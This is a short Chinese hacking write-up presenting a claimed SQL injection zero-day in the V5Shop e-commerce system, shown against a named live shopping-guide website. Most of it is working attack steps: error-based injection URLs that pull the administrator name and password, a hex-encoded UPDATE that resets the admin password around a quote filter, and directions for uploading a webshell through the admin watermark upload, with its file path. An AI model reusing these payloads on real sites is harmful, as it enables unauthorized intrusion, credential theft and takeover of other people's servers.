教程地址:http://www.myhack58.com/Soft/html/9/87/2010/2010070620132.htm

起因:渗透一taobao导购站:www.91t7t8.com
发现是v5shop最新版本.于是去官网下了套最新版本的.
发现是.NET写的.没办法看到源代码.只能盲注了.
因此有了这枚oday的产生.


http://www.91t7t8.com/commond.aspx?id=1869
没办法union,只能让它暴错了
暴管理员用户名:http://www.91t7t8.com/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--
暴管理员密 码:http://www.91t7t8.com/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--


过滤了单引号.只能把字符串转化成16进制的了

更新管理员密码:update web_admin set pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300



weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.


拿webshell
切记.千万不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp